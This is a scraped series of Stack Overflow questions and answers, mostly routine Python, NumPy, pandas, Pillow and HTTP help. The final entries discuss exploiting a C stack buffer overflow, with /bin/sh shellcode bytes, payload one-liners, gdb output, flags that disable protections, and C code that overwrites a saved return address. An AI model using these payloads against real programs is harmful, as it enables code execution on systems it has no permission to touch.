mean = np.mean(temperatures)
above = temperatures > mean   # elementwise comparison needs an ndarray, not a list
below = temperatures < mean
print mean
print sum(above)
print sum(below)
</code></pre>
<p>Note what was wrong with your syntax:</p>
<ol>
<li>You try to call <code>len()</code> on an integer</li>
<li>You put a <code>break</code> at the end of a while loop. This means you will only be able to get through the loop once</li>
<li>It appears you try to call <code>len.(above)</code>. There is no need for the period and also <code>len()</code> will return the length of <code>temperatures</code> whereas <code>sum()</code> returns the number of <code>True</code> values</li>
</ol>
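<p>For what it's worth, here is a hedged sketch of the stated task as a pure function (the sentinel handling separated from the counting), which sidesteps the list-vs-array comparison pitfall entirely:</p>

```python
# Reads temperatures until the 999 sentinel, then returns the average,
# the count of above-average days, and the count of negative days.
def summarize(readings):
    temps = []
    for t in readings:
        if t == 999:  # sentinel terminates input
            break
        temps.append(t)
    avg = float(sum(temps)) / len(temps)
    above = sum(1 for t in temps if t > avg)
    negative = sum(1 for t in temps if t < 0)
    return avg, above, negative

print(summarize([10, 20, -5, 15, 999, 30]))  # (10.0, 2, 1)
```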
| 0 | 2016-09-27T18:52:50Z | [
"python"
]
|
Subclassing numpy.ndarray - why is __array_finalize__ not being called twice here? | 39,732,213 | <p>According to <a href="http://docs.scipy.org/doc/numpy/user/basics.subclassing.html" rel="nofollow">this</a> primer on subclassing <code>ndarray</code>, the <code>__array_finalize__</code> method is guaranteed to be called, no matter if the subclass is instantiated directly, casted as a view or created from a template.</p>
<p>In particular, when calling the constructor explicitly, the order of methods called is <code>__new__</code> -> <code>__array_finalize__</code> -> <code>__init__</code>.</p>
<p>I have the following simple subclass of <code>ndarray</code> which allows an additional <code>title</code> attribute.</p>
<pre><code>class Frame(np.ndarray):
    def __new__(cls, input_array, title='unnamed'):
        print 'calling Frame.__new__ with title {}'.format(title)
        self = input_array.view(Frame) # does not call __new__ or __init__
        print 'creation of self done, setting self.title...'
        self.title = title
        return self

    def __array_finalize__(self, viewed):
        # if viewed is None, the Frame instance is being created by an explicit
        # call to the constructor, hence Frame.__new__ has been called and the
        # title attribute is already set
        #
        # if viewed is not None, the frame is either being created by view
        # casting or from template, in which case the title of the viewed object
        # needs to be forwarded to the new instance
        print '''calling Frame.__array_finalize__ with type(self) == {} and
type(viewed) == {}'''.format(type(self), type(viewed))
        if viewed is not None:
            self.title = getattr(viewed, 'title', 'unnamed')
            print self.title
</code></pre>
<p>which produces the following output:</p>
<pre><code>>>> f = Frame(np.arange(3), 'hallo')
calling Frame.__new__ with title hallo
calling Frame.__array_finalize__ with type(self) == <class '__main__.Frame'> and
type(viewed) == <type 'numpy.ndarray'>
unnamed
creation of self done, setting self.title...
>>> f.title
'hallo'
</code></pre>
<p>As you can see, <code>__array_finalize__</code> is being called as a result of the line</p>
<pre><code> self = input_array.view(Frame)
</code></pre>
<p>Question: why is <code>__array_finalize__</code> not being called again as part of the <code>__new__</code> -> <code>__array_finalize__</code> -> <code>__init__</code> chain?</p>
| 3 | 2016-09-27T18:48:35Z | 39,733,070 | <p>In the documentation you link to, it describes how <code>ndarray.__new__</code> will call <code>__array_finalize__</code> on the arrays it constructs. And your class's <code>__new__</code> method is causing that to happen when you create your instance as a <code>view</code> of an existing array. The <code>view</code> method on the array argument is calling <code>ndarray.__new__</code> for you, and it calls your <code>__array_finalize__</code> method before the instance is returned to you.</p>
<p>You don't see <code>__array_finalize__</code> called twice because you're not calling <code>ndarray.__new__</code> a second time. If your <code>__new__</code> method included a call to <code>super().__new__</code> in addition to the <code>view</code> call, you probably would see <code>__array_finalize__</code> called twice. Such behavior would probably be buggy (or at least, slower than necessary), so it's no surprise you're not doing it!</p>
<p>Python doesn't automatically call overridden methods when the overriding subclass's method gets called. It's up to the overriding method to call (or not call) the overridden version (directly with <code>super</code> or, as in this case, indirectly via another object's <code>view</code> method).</p>
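<p>A quick way to see that each creation path triggers exactly one <code>__array_finalize__</code> call (a sketch, assuming NumPy is available; the subclass name is made up):</p>

```python
import numpy as np

calls = []

class Tagged(np.ndarray):
    def __array_finalize__(self, obj):
        # obj is None for explicit construction, the source array for
        # view casting, and the parent instance for new-from-template
        calls.append(type(obj).__name__)

e = Tagged((2,))              # explicit construction -> one call, obj is None
t = np.arange(4).view(Tagged) # view casting -> one call, obj is the ndarray
s = t[:2]                     # new-from-template -> one call, obj is the Tagged parent
print(calls)
```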
| 1 | 2016-09-27T19:44:27Z | [
"python",
"numpy",
"inheritance"
]
|
Python 3: Traceback : TypeError | 39,732,281 | <p>I'm new in python 3 and I don't understand why I get a Type Error (this is a guess a number game for numbers between 0-100):</p>
<pre><code>print("Please think of a number between 0 and 100!")
low = 0
high = 100
check = False
while True :
    guess = (low + high)/2
    print("Enter 'h' to indicate the guess is too high.\n")
    print("Enter 'l' to indicate the guess is too low.\n" )
    print("Enter 'c' to indicate I guessed correctly.\n")
    ans = input("")
    if ans == "h" :
        low = ans
    elif ans == "l" :
        high = ans
    elif ans =="c" :
        print( "Game over. Your secret number was:{}".format(guess))
        break
    else :
        print("Sorry, I did not understand your input.")
</code></pre>
<p>here is the error : </p>
<pre><code>Traceback (most recent call last):
File "<stdin>", line 1, in <module>
</code></pre>
<p>Thanks in advance. I'd really appreciate your help; I'm stuck on this.</p>
| -1 | 2016-09-27T18:52:34Z | 39,732,418 | <p>On the line <code>low = ans</code> you set low to be a string value, the string value "h"</p>
<p>Then on the second time you pass through the loop, you try to calculate
<code>(low + high)/2</code>. You can't calculate <code>("h" + 100)/2</code> because you can't add a string to an integer. This is a "type error".</p>
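<p>To see the failure in isolation (the variable names just mirror the original code):</p>

```python
low = "h"   # accidentally a string, as in the original code
high = 100
error = None
try:
    guess = (low + high) / 2
except TypeError as exc:
    error = exc
print(error)  # adding str and int raises TypeError
```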
<p>For each line explain to a friend (or a soft toy) what each line does and why you are certain each line is correct.</p>
| 0 | 2016-09-27T19:01:46Z | [
"python",
"typeerror",
"traceback"
]
|
Python 3: Traceback : TypeError | 39,732,281 | <p>I'm new in python 3 and I don't understand why I get a Type Error (this is a guess a number game for numbers between 0-100):</p>
<pre><code>print("Please think of a number between 0 and 100!")
low = 0
high = 100
check = False
while True :
    guess = (low + high)/2
    print("Enter 'h' to indicate the guess is too high.\n")
    print("Enter 'l' to indicate the guess is too low.\n" )
    print("Enter 'c' to indicate I guessed correctly.\n")
    ans = input("")
    if ans == "h" :
        low = ans
    elif ans == "l" :
        high = ans
    elif ans =="c" :
        print( "Game over. Your secret number was:{}".format(guess))
        break
    else :
        print("Sorry, I did not understand your input.")
</code></pre>
<p>here is the error : </p>
<pre><code>Traceback (most recent call last):
File "<stdin>", line 1, in <module>
</code></pre>
<p>Thanks in advance. I'd really appreciate your help; I'm stuck on this.</p>
| -1 | 2016-09-27T18:52:34Z | 39,732,459 | <p>A couple of things. </p>
<ol>
<li>You should probably print the guess so that the user knows whether it is too high or too low</li>
<li><code>low = ans</code> doesn't make sense. <code>ans</code> will either be "h", "l", or "c", assuming the user follows the rules. <code>low</code> and <code>high</code> need to stay numbers (here, the previous <code>guess</code>) in order to generate the next <code>guess</code> appropriately</li>
</ol>
<p>Also your logic was incorrect. The below code works. </p>
<pre><code>print("Please think of a number between 0 and 100!")
low = 0
high = 100
check = False
while True:
    guess = (low + high)/2
    print("My guess is: %i" % guess)
    ans = input("Enter 'h' if guess it too high, 'l' if too low, or 'c' if correct: ")
    print(ans)
    if ans == "h":
        high = guess
    elif ans == "l":
        low = guess
    elif ans == "c":
        print("Game over. Your secret number was:{}".format(guess))
        break
    else:
        print("Sorry, I did not understand your input.")
</code></pre>
"python",
"typeerror",
"traceback"
]
|
Pandas: how to plot a line in a scatter and bring it to the back/front? | 39,732,288 | <p>I have checked to the best of my capabilities but haven't found any <code>kwds</code> that allow you to draw a line (such as <code>y=a-x</code>) on a <code>pandas</code> scatter plot (not necessarily the line of best fit) and bring it to the back (or to the front).</p>
<pre><code>#the data frame
ax=df.plot(kind='scatter', x='myX', y='myY',title="Nice title",
xlim=[0,100],ylim=[0,100],figsize=(8,5), grid=True,fontsize=10)
#the line
lnsp=range(0,110,10)
line=[100-i for i in lnsp] #line is y=100-x
ax=line_df.plot(kind='line',color='r',ax=ax,legend=False,grid=True,linewidth=3)
</code></pre>
<p>Is there anything I can use? Or is it just the order in which the two things are drawn?</p>
| 0 | 2016-09-27T18:53:06Z | 39,742,812 | <p>You need to define an axis, and then pass the pandas plot to that axis. You then plot whatever line to that previously defined axis. Here is a solution.</p>
<pre><code>import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

x = np.random.randn(100)
y = np.random.randn(100)
line = 0.5*np.linspace(-4, 4, 100)
x_line = np.linspace(-4, 4, 100)
fig, ax = plt.subplots(figsize=(8,5))
df = pd.DataFrame({"x": x, "y":y})
#You pass the wanted axis to the ax argument
df.plot(kind='scatter', x='x', y='y',title="Nice title", grid=True,fontsize=10, ax=ax)
ax.plot(line, x_line, zorder=-1)
</code></pre>
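<p>The back/front ordering itself is controlled by <code>zorder</code>: a lower value is drawn first, i.e. behind. A minimal sketch (using the headless Agg backend so no window is needed):</p>

```python
import matplotlib
matplotlib.use("Agg")  # headless backend: render without a window
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
pts = ax.scatter([10, 40, 70], [20, 60, 30], zorder=2)
line, = ax.plot([0, 100], [100, 0], color="r", zorder=1)  # behind the points
print(line.get_zorder() < pts.get_zorder())  # True: the line is drawn first
```

<p>This mirrors the <code>zorder=-1</code> used in the answer above: any value below the scatter's zorder pushes the line behind it.</p>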
| 1 | 2016-09-28T09:08:03Z | [
"python",
"pandas",
"matplotlib"
]
|
python remove last comma | 39,732,409 | <p>I have some thing like this in output.txt file</p>
<pre><code>Service1:Aborted
Service2:failed
Service3:failed
Service4:Aborted
Service5:failed
</code></pre>
<p>output in 2nd file(output2.txt) :</p>
<pre><code> Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>Would like to remove the last comma in the line.</p>
<p>Code I am trying:</p>
<pre><code>file=open('output.txt','r')
target=open('output2.txt','w')
for line in file.readlines():
    line=line.strip()
    parts=line.split(":")
    for part in parts:
        var2=part.strip()+","
        target.write(var2.rstrip(',')) # Not working
target.close()
</code></pre>
| 1 | 2016-09-27T19:01:01Z | 39,732,619 | <p>I found a simple way to do it (you can of course minimize the steps, but the idea is the same): take the string and reverse it. Then use string replace with a limit of one replacement; this replaces the first comma it encounters in the reversed string, which is the last comma of the original. Finally, reverse the string again and you are done!</p>
<pre><code>string = 'something, is, comma,'
reverse_string = string[::-1] # Reverse the String
reverse_string = reverse_string.replace(',', "", 1) # Remove the first comma
string = reverse_string[::-1] # Reverse the string again to create original
print(string)
</code></pre>
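<p>For comparison, the standard library can target the last separator directly: <code>str.rpartition</code> splits at the last occurrence, so no reversing is needed (a sketch of the same idea):</p>

```python
s = "something, is, comma,"
head, sep, tail = s.rpartition(",")  # split once, at the last comma
result = head + tail                 # everything except that comma
print(result)  # something, is, comma
```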
| -1 | 2016-09-27T19:15:47Z | [
"python",
"python-2.7",
"python-3.x"
]
|
python remove last comma | 39,732,409 | <p>I have some thing like this in output.txt file</p>
<pre><code>Service1:Aborted
Service2:failed
Service3:failed
Service4:Aborted
Service5:failed
</code></pre>
<p>output in 2nd file(output2.txt) :</p>
<pre><code> Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>Would like to remove the last comma in the line.</p>
<p>Code I am trying:</p>
<pre><code>file=open('output.txt','r')
target=open('output2.txt','w')
for line in file.readlines():
    line=line.strip()
    parts=line.split(":")
    for part in parts:
        var2=part.strip()+","
        target.write(var2.rstrip(',')) # Not working
target.close()
</code></pre>
| 1 | 2016-09-27T19:01:01Z | 39,732,926 | <p>Use a list and append the items to it. Accessing parts[-1] returns the last item from the splitted parts. Then use <code>join()</code> to put the commas in between all collected states:</p>
<pre><code>file=open('output.txt','r')
states = []
for line in file.readlines():
    parts=line.strip().split(':')
    states.append(parts[-1])
print(','.join(states))
</code></pre>
| 0 | 2016-09-27T19:34:25Z | [
"python",
"python-2.7",
"python-3.x"
]
|
python remove last comma | 39,732,409 | <p>I have some thing like this in output.txt file</p>
<pre><code>Service1:Aborted
Service2:failed
Service3:failed
Service4:Aborted
Service5:failed
</code></pre>
<p>output in 2nd file(output2.txt) :</p>
<pre><code> Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>Would like to remove the last comma in the line.</p>
<p>Code I am trying:</p>
<pre><code>file=open('output.txt','r')
target=open('output2.txt','w')
for line in file.readlines():
    line=line.strip()
    parts=line.split(":")
    for part in parts:
        var2=part.strip()+","
        target.write(var2.rstrip(',')) # Not working
target.close()
</code></pre>
| 1 | 2016-09-27T19:01:01Z | 39,733,876 | <p>This makes the output you originally requested:</p>
<pre><code>file=open('output.txt','r')
target=open('output2.txt','w')
states = [line.strip().split(':')[-1] for line in file.readlines()]
target.write(','.join(states))
target.close()
</code></pre>
<p>That is, the output of this code is:</p>
<pre><code>Aborted,failed,failed,Aborted,failed
</code></pre>
<p>For a table view, assuming the tabbed output will line up, this code:</p>
<pre><code>file=open('output.txt','r')
target=open('output2.txt','w')
states, titles = [], []
for line in file.readlines():
    title, state = line.strip().split(':')
    titles.append(title)
    states.append(state)
target.write('\t'.join(titles))
target.write('\n')
target.write('\t'.join(states))
target.close()
</code></pre>
<p>will produce the requested table view (note there are no commas in this output):</p>
<pre><code>Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>If you want to control alignment more precisely, you'll need to apply formatting, such as measuring the maximum width of text in each column and then using that as a formatting specifier.</p>
| 0 | 2016-09-27T20:37:51Z | [
"python",
"python-2.7",
"python-3.x"
]
|
Why does Pandas skip first set of chunks when iterating over csv in my code | 39,732,421 | <p>I have a very large CSV file that I read via iteration with pandas' chunks function. The problem: If e.g. chunksize=2, it skips the first 2 rows and the first chunks I receive are row 3-4.</p>
<p>Basically, if I read the CSV with nrows=4, I get the first 4 rows while chunking the same file with chunksize=2 gets me first row 3 and 4, then 5 and 6, ...</p>
<pre><code>#1. Read with nrows
#read first 4 rows in csv files and merge date and time column to be used as index
reader = pd.read_csv('filename.csv', delimiter=',', parse_dates={"Datetime" : [1,2]}, index_col=[0], nrows=4)
print (reader)
01/01/2016 - 09:30 - A - 100
01/01/2016 - 13:30 - A - 110
01/01/2016 - 15:30 - A - 120
02/01/2016 - 10:30 - A - 115
#2. Iterate over csv file with chunks
#iterate over csv file in chunks and merge date and time column to be used as index
reader = pd.read_csv('filename.csv', delimiter=',', parse_dates={"Datetime" : [1,2]}, index_col=[0], chunksize=2)
for chunk in reader:
    #create a dataframe from chunks
    df = reader.get_chunk()
    print (df)
01/01/2016 - 15:30 - A - 120
02/01/2016 - 10:30 - A - 115
</code></pre>
<p>Increasing chunksize to 10 skips first 10 rows.</p>
<p>Any ideas how I can fix this? I already got a workaround that works, I'd like to understand where I got it wrong.</p>
<p>Any input is appreciated!</p>
| 1 | 2016-09-27T19:02:03Z | 39,733,348 | <p>Don't call <code>get_chunk</code>. You already have your chunk since you're iterating over the reader, i.e. <code>chunk</code> is your DataFrame. Call <code>print(chunk)</code> in your loop, and you should see the expected output.</p>
<p>As @MaxU points out in the comments, you want to use <code>get_chunk</code> if you want differently sized chunks: <code>reader.get_chunk(500)</code>, <code>reader.get_chunk(100)</code>, etc.</p>
| 1 | 2016-09-27T20:02:23Z | [
"python",
"csv",
"pandas",
"chunks"
]
|
Python redmine api: journals.filter usage | 39,732,493 | <p>For example I have an issue:</p>
<pre><code>issue = redmine.issue.get(100)
</code></pre>
<p>It is possible to get the notes of particular user for this issue?</p>
<p>I found journals.filter method:</p>
<pre><code>issue.journals.filter()
</code></pre>
<p>But I don't know syntax for filter() method.</p>
<p>Can somebody help?</p>
<p>Thanks in advance.</p>
<p>BR, Alex</p>
| 0 | 2016-09-27T19:06:20Z | 39,741,119 | <p>Redmine API doesn't allow you to do that via direct API calls, so you have to first include journals (otherwise you'll make 2 API calls instead of one) and then iterate over them and check if that record belongs to the needed user, e.g.:</p>
<pre><code>issue = redmine.issue.get(ISSUE_ID, include='journals')
for record in issue.journals:
    if record.user.id == USER_ID:
        print record.id, record.created_at
        print record.notes
        print record.details
</code></pre>
| 0 | 2016-09-28T07:46:02Z | [
"python",
"python-redmine"
]
|
Pillow handles PNG files incorrectly | 39,732,548 | <p>I can successfully convert a rectangular image into a png with transparent rounded corners like this: </p>
<p><a href="http://i.stack.imgur.com/phKNv.png" rel="nofollow"><img src="http://i.stack.imgur.com/phKNv.png" alt=".png image with transparent corners"></a></p>
<p>However, when I take this transparent cornered image and I want to use it in another image generated with Pillow, I end up with this: <a href="http://i.stack.imgur.com/7iJb0.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/7iJb0.jpg" alt="transparent corners turned black by Pillow"></a></p>
<p>The transparent corners become black. I've been playing around with this for a while but I can't find any way in which the transparent parts of an image don't turn black once I place them on another image with Pillow.
Here is the code I use:</p>
<pre><code>mask = Image.open('Test mask.png').convert('L')
im = Image.open('boat.jpg')
im.resize(mask.size)
output = ImageOps.fit(im, mask.size, centering=(0.5, 0.5))
output.putalpha(mask)
output.save('output.png')
im = Image.open('output.png')
image_bg = Image.new('RGBA', (1292,440), (255,255,255,100))
image_fg = im.resize((710, 400), Image.ANTIALIAS)
image_bg.paste(image_fg, (20, 20))
image_bg.save('output2.jpg')
</code></pre>
<p>Is there a solution for this? Thanks.</p>
<p>Per some suggestions I exported the 2nd image as a PNG, but then I ended up with an image with holes in it:
<a href="http://i.stack.imgur.com/qGd0n.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/qGd0n.jpg" alt="enter image description here"></a>
Obviously I want the second image to have a consistent white background without holes.</p>
<p>Here is what I actually want to end up with. The orange is only placed there to highlight the image itself. It's a rectangular image with white background, with a picture placed into it with rounded corners.
<a href="http://i.stack.imgur.com/XMKxS.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/XMKxS.jpg" alt="enter image description here"></a></p>
| 1 | 2016-09-27T19:10:44Z | 39,819,047 | <p>If you paste an image with transparent pixels onto another image, the transparent pixels are just copied as well. It looks like you only want to paste the non-transparent pixels. In that case, you need a mask for the <code>paste</code> function.</p>
<pre><code>image_bg.paste(image_fg, (20, 20), mask=image_fg)
</code></pre>
<p>Note the third argument here. From the documentation:</p>
<blockquote>
<p>If a mask is given, this method updates only the regions indicated by
the mask. You can use either "1", "L" or "RGBA" images (in the latter
case, the alpha band is used as mask). Where the mask is 255, the
given image is copied as is. Where the mask is 0, the current value
is preserved. Intermediate values will mix the two images together,
including their alpha channels if they have them.</p>
</blockquote>
<p>What we did here is provide an RGBA image as the mask argument, so its alpha channel decides which pixels get copied.</p>
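<p>A tiny synthetic check of that behavior (assuming Pillow is installed; sizes and colors are arbitrary):</p>

```python
from PIL import Image

bg = Image.new("RGBA", (4, 4), (255, 255, 255, 255))  # white background
fg = Image.new("RGBA", (4, 4), (255, 0, 0, 255))      # red foreground...
fg.putpixel((0, 0), (0, 0, 0, 0))                     # ...with one transparent pixel
bg.paste(fg, (0, 0), mask=fg)                         # alpha channel acts as the mask

print(bg.getpixel((0, 0)))  # (255, 255, 255, 255): background preserved
print(bg.getpixel((1, 1)))  # (255, 0, 0, 255): opaque pixel pasted
```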
| 0 | 2016-10-02T16:20:33Z | [
"python",
"pillow"
]
|
HTTP post Json 400 Error | 39,732,571 | <p>I am trying to post data to my server from my microcontroller. I need to send raw http data from my controller and this is what I am sending below:</p>
<pre><code>POST /postpage HTTP/1.1
Host: https://example.com
Accept: */*
Content-Length: 18
Content-Type: application/json
{"cage":"abcdefg"}
</code></pre>
<p>My server requires JSON encoding and not form encoded request.</p>
<p>For the above request, I get a 400 error from the server: HTTP/1.1 400 Bad Request.</p>
<p>However, when I post to my server via a Python script from my laptop, I am able to get a proper response.</p>
<pre><code>import requests
url='https://example.com'
mycode = 'abcdefg'
def enter():
    value = requests.post('url/postpage',
                          params={'cage': mycode})
    print vars(value)
enter()
</code></pre>
<p>Can anyone please let me know where I could be going wrong in the raw http data I'm sending above ?</p>
| 0 | 2016-09-27T19:12:26Z | 39,732,678 | <p>HTTP separates header lines with CRLF (<code>\r\n</code>) and requires a blank line (a double CRLF) between the headers and the body. Note also that the <code>Host</code> header takes just the host name, not a URL:</p>
<pre><code>POST /postpage HTTP/1.1
Host: example.com
Accept: */*
Content-Length: 18
Content-Type: application/json

{"cage":"abcdefg"}
</code></pre>
<hr>
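<p>A sketch of building such a request programmatically, so the <code>Content-Length</code> always matches the encoded body (host and path are the hypothetical ones from the question):</p>

```python
import json

host = "example.com"  # hypothetical
path = "/postpage"
body = json.dumps({"cage": "abcdefg"})

request = (
    "POST {} HTTP/1.1\r\n"
    "Host: {}\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: {}\r\n"
    "\r\n"            # blank line between headers and body
    "{}"
).format(path, host, len(body), body)

print(repr(request))
```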
<p>If you don't think you've got all of the request right, try seeing what was sent by Python:</p>
<pre><code>response = ...
request = response.request # request is a PreparedRequest.
headers = request.headers
url = request.url
</code></pre>
<p>Read the <a href="http://docs.python-requests.org/en/master/api/?highlight=logging#requests.PreparedRequest" rel="nofollow">docs for <code>PreparedRequest</code></a> for more information.</p>
<hr>
<p>To pass a parameter, use this Python:</p>
<pre><code>REQUEST = 'POST /postpage%s HTTP/1.1\r\nHost: example.com\r\nContent-Length: 0\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/4.4.11-v7+\r\n\r\n'

def build_request(params):
    query = ''
    for k, v in params.items():
        query += '&' + k + '=' + v  # URL-encode here if you want.
    if len(query): query = '?' + query[1:]
    return REQUEST % query
</code></pre>
| 0 | 2016-09-27T19:20:01Z | [
"python",
"json",
"http-post"
]
|
Why is my stack buffer overflow exploit not working? | 39,732,600 | <p>So I have a really simple stackoverflow:</p>
<pre><code>#include <stdio.h>

int main(int argc, char *argv[]) {
    char buf[256];
    memcpy(buf, argv[1], strlen(argv[1]));
    printf(buf);
}
</code></pre>
<p>I'm trying to overflow with this code:</p>
<pre><code>$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
</code></pre>
<p>When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.</p>
<p>Does anyone see the problem? Note: My python may be wrong.</p>
<hr>
<p>UPDATE</p>
<p>What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so, </p>
<pre><code>$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
</code></pre>
<hr>
<p>UPDATE</p>
<p>Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?</p>
<hr>
<p>UPDATE</p>
<p>Nevermind ya'll, I got it working. Thanks for all your help.</p>
<hr>
<p>UPDATE</p>
<p>Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.</p>
<p>All Im doing is overflowing the stack at the beginning and pointing my shellcode there.</p>
<p>Like so,</p>
<pre><code>r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
</code></pre>
<p>This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.</p>
<p>This is what gdb gives me,</p>
<pre><code>Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
</code></pre>
<p>The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?</p>
<p>When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?</p>
<p>Any help would be appreciated.</p>
<p>Also, I'm compiling with the following options:</p>
<pre><code>gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
</code></pre>
<p>It's really odd because any other address works except the one I need.</p>
<hr>
<p>UPDATE</p>
<p>I can successfully spawn a shell with the following in gdb,</p>
<pre><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
</code></pre>
<p>But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.</p>
<p>For instance, now when I run the following I get this in gdb...</p>
<pre><code>Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
</code></pre>
<p>This seems to be caused by execstack be turned on.</p>
<hr>
<p>UPDATE</p>
<p>Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.</p>
| 5 | 2016-09-27T19:14:19Z | 39,737,987 | <p>This isn't going to work too well [as written]. However, it <em>is</em> possible, so read on ...</p>
<hr>
<p>It helps to know what the actual stack layout is when the <code>main</code> function is called. It's a bit more complicated than most people realize.</p>
<p>Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.</p>
<p>The kernel does the following:</p>
<p>It calculates how much space is needed for the environment variable strings (i.e. <code>strlen("HOME=/home/me") + 1</code> for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. <code>envcount</code>) and creates an <code>char *envp[envcount + 1]</code> on the stack and fills in the <code>envp</code> values with pointers to the given strings. It null terminates this <code>envp</code></p>
<p>A similar process is done for the <code>argv</code> strings.</p>
<p>Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. <code>_start</code> from <code>crt0.o</code>) which does some init and then calls <code>main(argc,argv,envp)</code></p>
<p>This is [sort of] what the stack looks like when <code>main</code> gets called:</p>
<pre><code>"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
    // address of "HOME" string
    // address of "LOGNAME" string
    // address of "SHELL" string
    NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
    // pointer to argument string 0
    // pointer to argument string 1
    // pointer to argument string 2
    NULL
};
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
</code></pre>
<p>On an <code>x86</code>, the <code>argc</code>, <code>argv</code>, and <code>envp</code> pointer values are put into the first three argument registers of the <code>x86</code> ABI.</p>
<hr>
<p>Here's the problem [problems, plural, actually] ...</p>
<p>By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with <code>-fPIC</code>.</p>
<p>And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <code><byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...</code>) would only transfer the first three bytes and <em>not</em> the entire shell code program.</p>
<p>Nor do you have a good idea as to what the stack pointer value is.</p>
<p>Also, you need to <em>find</em> the memory word on the stack that <em>has</em> the return address in it (i.e. this is what the start function's <code>call main</code> asm instruction pushes).</p>
<p>This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a <code>main</code> stack frame variable (e.g. <code>buf</code>). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.</p>
<p>Also, on <code>x86</code> architectures, there is special mitigation hardware. For example, a page can be marked <code>NX</code> [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.</p>
<hr>
<p>Here's the [easy] solution ...</p>
<p><code>gcc</code> has some intrinsic functions that can help: <code>__builtin_return_address</code>, <code>__builtin_frame_address</code>.</p>
<p>So, get the value of the real return address from the intrinsic [call this <code>retadr</code>]. Get the address of the stack frame [call this <code>fp</code>].</p>
<p>Starting from <code>fp</code> and incrementing (by <code>sizeof(void*)</code>) toward higher memory, find a word that matches <code>retadr</code>. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8</p>
<p>So, then do: <code>*fp = argv[1]</code> and return.</p>
<p>Note, extra steps may be necessary because if the stack has the <code>NX</code> bit set, the string pointed to by <code>argv[1]</code> is on the stack as mentioned above.</p>
<hr>
<p>Here is some example code that works:</p>
<pre><code>#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

void
shellcode(void)
{
    static char buf[] = "shellcode: hello\n";
    char *cp;

    for (cp = buf; *cp != 0; ++cp);

    // NOTE: in real shell code, we couldn't rely on using this function, so
    // these would need to be the CPP macro versions: _syscall3 and _syscall2
    // respectively or the syscall function would need to be _statically_
    // linked in
    syscall(SYS_write,1,buf,cp - buf);

    syscall(SYS_exit,0);
}

int
main(int argc,char **argv)
{
    void *retadr = __builtin_return_address(0);
    void **fp = __builtin_frame_address(0);
    int iter;

    printf("retadr=%p\n",retadr);
    printf("fp=%p\n",fp);

    // NOTE: for your example, replace:
    //   *fp = (void *) shellcode;
    // with:
    //   *fp = (void *) argv[1]
    for (iter = 20; iter > 0; --iter, fp += 1) {
        printf("fp=%p %p\n",fp,*fp);
        if (*fp == retadr) {
            *fp = (void *) shellcode;
            break;
        }
    }

    if (iter <= 0)
        printf("main: no match\n");

    return 0;
}
</code></pre>
| 0 | 2016-09-28T04:20:11Z | [
"python",
"c",
"stack-overflow",
"buffer-overflow"
]
|
Why is my stack buffer overflow exploit not working? | 39,732,600 | <p>So I have a really simple stackoverflow:</p>
<pre><code>#include <stdio.h>

int main(int argc, char *argv[]) {
    char buf[256];
    memcpy(buf, argv[1], strlen(argv[1]));
    printf(buf);
